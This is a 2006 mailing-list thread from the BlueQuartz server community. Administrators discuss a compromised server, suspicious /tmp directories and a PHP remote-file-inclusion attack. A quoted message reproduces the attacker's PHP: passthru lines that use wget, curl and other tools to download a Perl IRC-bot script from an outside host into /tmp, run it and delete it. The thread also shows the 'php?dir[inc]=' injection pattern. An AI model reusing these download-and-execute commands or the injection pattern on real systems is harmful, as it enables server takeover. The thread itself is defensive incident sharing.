Date:  Mon, 11 Sep 2006 23:19:51 +0100
From:  paul <paul (at mark) planetcentral.net>
Subject:  [coba-e:06838] Re: /TMP Directory
To:  coba-e (at mark) bluequartz.org
Message-Id:  <4505E107.1060300 (at mark) planetcentral.net>
In-Reply-To:  <02d601c6d583$ee2f57f0$0e00a8c0 (at mark) office.swiftinter.net>
References:  <002701c6d450$c0c58480$6400a8c0 (at mark) YOUR4105E587B6> <02d601c6d583$ee2f57f0$0e00a8c0 (at mark) office.swiftinter.net>
X-Mail-Count: 06838

:o oh my god... have been trying for the last 2 days to work out what 
was up with my server, and thats it....

I seem to have the following in my /tmp folder :


total 44
drwxrwxrwt   5 root   root   4096 Sep 11 23:11 .
drwxr-xr-x  25 root   root   4096 Sep 11 22:10 ..
-rw-------   1 root   root     49 Sep 11 23:11 ClamAVBusy.lock
drwxrwxrwt   2 root   root   4096 Sep 11 22:10 .ICE-unix
drwxr-xr-x  10 apache apache 4096 Sep 11 22:09 .LiveZone
drwxr-xr-x   9 apache apache 4096 Sep 11 23:06 matahati
-rw-------   1 root   root   4697 Sep  9 21:35 .spamassassin4037sdcX9Htmp
-r--r--r--   1 root   root    275 Sep 11 23:01 yum.check-update
-rw-r--r--   1 root   root   1367 Sep 11 05:31 yum.update

Now the Clam i can understand. The yum and the spam assasin also. The 
rest shouldnt be there and need to be removed.

Please PLEASE could someone tell me how i can rid myself of this!

Now i know why i'm getting perl scripts hanging, using 98% Cpu time and 
the box load hits over 50 and things stop working!

Please help... It's only a home box with a couple of sites on it, but i 
want to get it back!!

Thanks
Paul


Paul Wilson - Swift Internet wrote:
> It is also likely that your PHP script has a severe vulnerability in it
>
> I think the attack was in two parts - did you see the php script being 
> used in the following way (check your access_log)
>
> ****php?dir[inc]=http:// "URL location of attack script"
>
> This script would then be run to pull in the v6 script that you saw in 
> action.
>
>
> The "php?dir[inc]" vulnerability became known at the tail end of 
> August, so these attacks are going to become more widespread.
>
> And yes, one of our servers was hit this way.
>
>
> Regards
>
> Paul
>
>
> ----- Original Message ----- From: "Darrell D. Mobley" 
> <dmobley (at mark) uhostme.net>
> To: <coba-e (at mark) bluequartz.org>
> Sent: Saturday, September 09, 2006 9:44 PM
> Subject: [coba-e:06808] /TMP Directory
>
>
>> There was some discussion here lately about the security fix that 
>> stopped
>> programs from running in /TMP.  Is this configured by default if you 
>> have
>> your BQ Yum updated?  I got a DDOS today where the users were trying 
>> to run
>> the following program via PHP:
>>
>> <?
>> passthru('cd /tmp;wget http://perqafohu.com/~armendibx/oki/v6.txt;perl
>> v6.txt;rm -f v6*');
>> passthru('cd /tmp;curl -O 
>> http://perqafohu.com/~armendibx/oki/v6.txt;perl
>> v6.txt;rm -f v6*');
>> passthru('cd /tmp;lwp-download
>> http://perqafohu.com/~armendibx/oki/v6.txt;perl v6.txt;rm -f v6*');
>> passthru('cd /tmp;lynx -source 
>> http://perqafohu.com/~armendibx/oki/v6.txt
>>> v6.txt;perl v6.txt;rm -f v6*');
>> passthru('cd /tmp;fetch http://perqafohu.com/~armendibx/oki/v6.txt
>>> v6.txt;perl v6.txt;rm -f v6*');
>> passthru('cd /tmp;GET http://perqafohu.com/~armendibx/oki/v6.txt
>>> v6.txt;perl v6.txt;rm -f v6*');
>> ?>
>>
>> The v6.txt is a Perl script that installs some IRC software and 
>> monitors IRC
>> on open ports.  I do not think the script was successful in running, 
>> but I
>> just want to make sure the /TMP security is enabled where files can't 
>> be run
>> there.  While I don't think the DDOS attack was successful in running 
>> the
>> script, it was successful in shutting down the serer due to MySQL 
>> becoming
>> overwhelmed.  Server load was up to 156!
>>
>> Any suggestions would be appreciated.
>>
>>
>
>


-- 
This message has been scanned for viruses and
dangerous content by MailScanner, and is
believed to be clean.